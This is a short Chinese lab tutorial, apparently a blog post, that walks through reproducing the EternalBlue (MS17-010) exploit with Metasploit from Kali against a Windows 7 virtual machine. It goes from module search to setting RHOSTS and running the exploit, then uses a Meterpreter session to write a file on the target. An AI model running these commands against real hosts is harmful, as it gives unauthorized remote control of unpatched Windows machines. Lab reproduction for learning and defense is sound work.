msf复现“永恒之蓝”
前提声明:永恒之蓝相关内容只能在win7上实现,本文将在win7的虚拟机上验证结果
一、通过kali进入msf终端
┌──(root㉿kali)-[~]
└─# msfconsole
二、在msf终端查询永恒之蓝的模块
永恒之蓝的编号(名称)为:MS17-010
msf6 > search MS17-010
三、查询列出的某一模块的信息
msf6 > info + 模块序号 或者
msf6>info + 模块名字
eg:查询序号0模块的信息
后面为yes说明是必须设置的参数,如果有默认或者自动参数则可不设置
四、使用永恒之蓝的模块(序号0的模块)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
设置模块的参数(可以只设置必须设置的参数,如:RHOSTS)
RHOSTS需要设置目标主机的ip地址(win7虚拟机上的ip)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.117.135
五、运行模块
直接run它,等它攻击成功
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
攻击成功,进入meterpreter终端
六、使用meterpreter相关命令对目标主机进行操作
可以在网上搜索meterpreter的命名大全
eg本站的Meterpreter命令合集(详细)_meterpreter命令大全-CSDN博客
此处演示在目标主机上创建文本文件:
meterpreter > edit C:\\1.txt
写入文本并保存
七、结果验证
在目标主机上发现了刚才写入的文本1.txt
永恒之蓝的其一模块使用msf复现完毕